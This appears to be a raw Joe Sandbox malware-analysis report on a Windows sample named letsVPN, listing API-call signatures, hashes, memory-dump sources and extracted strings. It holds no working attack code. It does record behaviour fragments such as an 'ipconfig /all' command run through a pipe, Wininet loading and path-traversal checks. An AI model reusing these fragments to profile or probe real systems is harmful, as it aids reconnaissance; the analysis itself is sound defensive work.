                                                                                                                                                                                                    control_flow_graph 1278 180009a9c-180009ae6 1280 180009b91-180009bb3 call 180012200 1278->1280 1281 180009aec-180009aef 1278->1281 1283 180009af2-180009b0b 1281->1283 1287 180009b0d-180009b10 1283->1287 1288 180009b12-180009b36 call 180010400 1287->1288 1289 180009b50-180009b58 1287->1289 1288->1289 1296 180009bb4 call 180012780 1288->1296 1290 180009b67-180009b82 call 180012830 GetFileAttributesW 1289->1290 1291 180009b5a-180009b62 call 18001285c 1289->1291 1290->1280 1298 180009b84-180009b8b CreateDirectoryW 1290->1298 1291->1290 1298->1280
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocHeap_callnewh_errno_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2695012009-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep$Count64Tick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2406120688-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: Wininet.dll
                                                                                                                                                                                                    • API String ID: 1029625771-1097394720
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4082711253-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2738559852-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: wcsstr$File$Time$ByteCharLocalMultiPointerWidewcscpy
• String ID: /../$/..\$\../$\..\
• API String ID: 2997815599-3885502717
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: _invoke_watson$wcscspn
• String ID: .$_.,
• API String ID: 1707156713-3384562259
APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: Heap$FreeProcess_errno_lseeki64_nolock_setmode_nolock
• String ID:
• API String ID: 225511624-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2239857169.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.2239823102.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240059649.00000001400B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240796539.00000001400B4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240796539.0000000140AB4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2242622200.0000000140E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2242796796.00000001410C1000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2242796796.0000000141AC1000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2244219068.0000000141F7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2244243523.0000000141F84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_letsVPN.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000018000DE73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid block type$invalid stored block lengths$too many length or distance symbols
                                                                                                                                                                                                    • API String ID: 0-26694007
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CaptureContext$CurrentDebuggerEntryFunctionLookupPresentUnwindVirtual__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2948380444-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ConsoleFileWrite_errno$ByteCharModeMultiWide_getptd_getptd_noexit_invalid_parameter_noinfo_isatty_lseeki64_nolockisleadbyte
                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                    • API String ID: 3520455412-4171548499
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4099253644-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionThrow$std::system_error::system_error
                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                    • API String ID: 1466986864-1866435925
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: `=e$bad cast
                                                                                                                                                                                                    • API String ID: 669907958-2264749266
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast__freetlocinfo_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2902648625-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharMultiWidefree$CommandFreeHeapInitializeLineProcess__crt__setargv_calloc_crt_cinit_heap_init_ioinit_ioterm_mtinit_mtterm_setenvp
• String ID:
• API String ID: 3777929205-0
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowctypestd::bad_exception::bad_exception
• String ID: bad cast
• API String ID: 2884461038-3145022300
Similarity
• API ID: _get_osfhandle$Handle_lseeki64_nolock$CloseErrorLast_close_nolock_dosmaperr_errno_free_osfhnd_read_nolock$File__create_set_osfhnd_write
• String ID:
• API String ID: 854651379-0
Similarity
• API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
• String ID: csm
• API String ID: 1037122555-1018135373
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProcstd::exception::exception
• String ID: RoInitialize$combase.dll
• API String ID: 1703389215-340411864
Similarity
• API ID: _lseeki64_nolock$_read_nolock$CloseErrorFileHandleLast__create_close_nolock_dosmaperr_errno_free_osfhnd_get_osfhandle_write
• String ID:
• API String ID: 1845299851-0
Similarity
• API ID: CloseHandle_set_osfhnd_unlock_fhandle$_errno_invoke_watson
• String ID:
• API String ID: 455515276-0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_getbuf_read
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2955468974-0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_errnosetlocalestd::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1855319098-0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$StringType__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3694965756-0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 415692148-2662692612
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1281092736-0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$EncodeFileHeaderPointerRaiseThrow_callnewh_calloc_crt
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 2702659324-2104205924
                                                                                                                                                                                                    • Opcode ID: 5bae105f3c952d40fb91f665a23065520cc5472c36bec98307b8226bbcaa616f
                                                                                                                                                                                                    • Instruction ID: dc9fa018054779c8fcebb0e85de3db94547e0c3b80cccd7f8437f53606e47c3f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bae105f3c952d40fb91f665a23065520cc5472c36bec98307b8226bbcaa616f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C011AC71601B4D81EFABDB60A8513E973A4E75D3C0F448124AA4A0A7A5EF38C39DC740
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fgetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2807381905-0
                                                                                                                                                                                                    • Opcode ID: 66ab226773c4ed29c2b3b73b3ffce2dcde4310284dfe12c51d04ebbb69d2a6f4
                                                                                                                                                                                                    • Instruction ID: 78140f8f51e7571bcd2013dda56526475d110ba6fe59e891c556e2589ded328f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66ab226773c4ed29c2b3b73b3ffce2dcde4310284dfe12c51d04ebbb69d2a6f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8711537216A84D9EBA2CF75C4903DC33A5F748B98F548622EA5D87B99DF35C658C300
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                    • Opcode ID: 914c7e8c9e0c7ea7e7598fbd7753b30a9f1dd545e222c54bf50bce79fb68c9f0
                                                                                                                                                                                                    • Instruction ID: 512f3f5380ac9d776c87858e981df87ea363a793a3dc2e47b707a79be0fa403e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c7e8c9e0c7ea7e7598fbd7753b30a9f1dd545e222c54bf50bce79fb68c9f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C41F273A0169982EBF7AB25E1403F973A0E748BD5F94C126FA950B6C5DF28CB59C700
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                    • Opcode ID: fef4be43230211745b757583544e173985db2e9b550421944e270028302490ac
                                                                                                                                                                                                    • Instruction ID: 590762b1f0db7b029fd590709c2b03e69e4f35f6dcab51a84d546098a8333d68
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fef4be43230211745b757583544e173985db2e9b550421944e270028302490ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15410672A04AE982EBE65B1194503FD33A0E769BE0FD4C126F6D5076C4DE28CB598700
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                    • Opcode ID: 9e4fadaa998d07455157caef082a8ac16103ede1be2d2d3d04bf9a7975dcdca8
                                                                                                                                                                                                    • Instruction ID: 6da1e2860e90ad5ce6891b8704c71763f15746ac8b0e06677ba9dfa64d3fdf9b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4fadaa998d07455157caef082a8ac16103ede1be2d2d3d04bf9a7975dcdca8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441A432214BC486E7A28F15D1807AD7BA5FB49BC4F18812AFF8957B95CF38C646C700
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __pctype_func_getptd$___lc_codepage_func___lc_locale_name_func_calloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3272742379-0
                                                                                                                                                                                                    • Opcode ID: 84c5df84ef0c5cdd2e916334a6bf5530221d79a09e6cc33207ddf97f696cff82
                                                                                                                                                                                                    • Instruction ID: 041c17907dc4557987ee74c4032ed46d644b029682cb8f8ccb5bb24993d1226d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c5df84ef0c5cdd2e916334a6bf5530221d79a09e6cc33207ddf97f696cff82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70F0FF72601B4985FB96EFA1D0553DD7290EB4EF88F18C424BA480F3DADF78C6988391
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                    • Opcode ID: e0e06d72c905a5df2db11f44fd49f3875c1da61348c6b35bcc64d3be87afdf69
                                                                                                                                                                                                    • Instruction ID: 8eacf6c3a0e0d25c8626d20b650a7e713e01794de6f99655e7c2036657d12a82
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0e06d72c905a5df2db11f44fd49f3875c1da61348c6b35bcc64d3be87afdf69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF01C32605D8884FFE76BD5E1423FC62E1A75CBC8F0CC521FA540728BDE24CA988755
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: std::exception::exception.LIBCMT ref: 000000018000791C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _CxxThrowException.LIBCMT ref: 0000000180007939
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: fgets.LIBCMT ref: 000000018000794C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _pclose.LIBCMT ref: 0000000180007980
                                                                                                                                                                                                      • Part of subcall function 0000000180001C6C: std::ios_base::getloc.LIBCPMT ref: 0000000180001C98
                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0000000180007DB0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionIos_base_dtorThrow_pclosefgetsstd::exception::exceptionstd::ios_base::_std::ios_base::getloc
                                                                                                                                                                                                    • String ID: /al$ipco$nfig
                                                                                                                                                                                                    • API String ID: 3465259001-4231646982
                                                                                                                                                                                                    • Opcode ID: 6a92920c7bc4735bc74e8adb372b0bc37048f94f376ff593bf359793745f81a4
